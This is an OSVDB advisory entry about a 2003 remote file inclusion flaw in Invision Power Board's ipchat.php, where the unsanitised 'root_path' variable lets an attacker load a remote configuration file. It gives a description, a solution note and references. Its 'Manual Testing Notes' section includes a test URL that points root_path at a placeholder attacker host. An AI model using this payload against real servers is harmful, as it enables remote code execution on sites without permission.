Invision Power Board ipchat.php Arbitrary File Include

2003-02-27T00:00:00
ID OSVDB:3357
Type osvdb
Reporter OSVDB
Modified 2003-02-27T00:00:00

Description

Vulnerability Description

Invision PowerBoard allows a remote attacker to include malicious PHP files if register_globals is enabled. The issue is due to the ipchat.php script not sanitizing the "root_path" variable, allowing an attacker to specify an alternate path for the configuration. By providing a custom conf_global.php file, the attacker can execute custom scripts on the remote server.

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, the vulnerability discoverer has released a patch to address this vulnerability.

Short Description

Invision PowerBoard allows a remote attacker to include malicious PHP files if register_globals is enabled. The issue is due to the ipchat.php script not sanitizing the "root_path" variable, allowing an attacker to specify an alternate path for the configuration. By providing a custom conf_global.php file, the attacker can execute custom scripts on the remote server.

Manual Testing Notes

http://[target]/ipchat.php?root_path=http://[attacker]/conf_global.php

References:

Vendor URL: http://www.invisionboard.com/ Secunia Advisory ID:8182 Other Solution URL: http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=i&PHPSESSID=6455cceea80e4904a6b559444a581081 Mail List Post: http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0099.html ISS X-Force ID: 11435 Bugtraq ID: 6976